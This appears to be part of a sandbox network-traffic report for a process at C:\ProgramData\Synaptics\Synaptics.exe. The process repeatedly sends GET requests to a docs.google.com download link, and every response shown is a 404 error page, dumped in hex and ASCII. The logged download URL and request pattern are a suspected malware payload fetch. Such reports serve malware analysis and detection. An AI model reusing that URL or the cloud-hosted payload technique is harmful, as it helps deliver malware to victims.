                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC10INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC11INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 41 74 52 31 39 49 35 4a 34 4d 73 4c 70 2d 6d 2d 42 77 2d 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IAtR19I5J4MsLp-m-Bw-7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC12INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          30192.168.2.349777172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC90OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC93INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC94INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC94INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 62 63 57 52 75 61 69 4b 48 68 75 39 55 66 38 51 4d 4b 43 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FbcWRuaiKHhu9Uf8QMKCOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC96INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC96INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          4192.168.2.349743172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:19 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC15INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC17INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 79 62 4e 6e 66 55 54 49 64 36 50 5a 4f 47 79 50 50 52 37 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC18INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC19INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          5192.168.2.349744172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:19 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC12INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC14INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 5f 45 58 6f 70 38 42 36 4c 41 38 48 2d 56 4a 66 66 4b 55 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u_EXop8B6LA8H-VJffKUSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC15INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC15INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          6192.168.2.349745172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC19INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC20INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 72 6f 77 6d 73 55 30 44 63 54 77 72 6e 42 77 4a 59 47 68 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC22INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC22INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          7192.168.2.349747172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC22INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
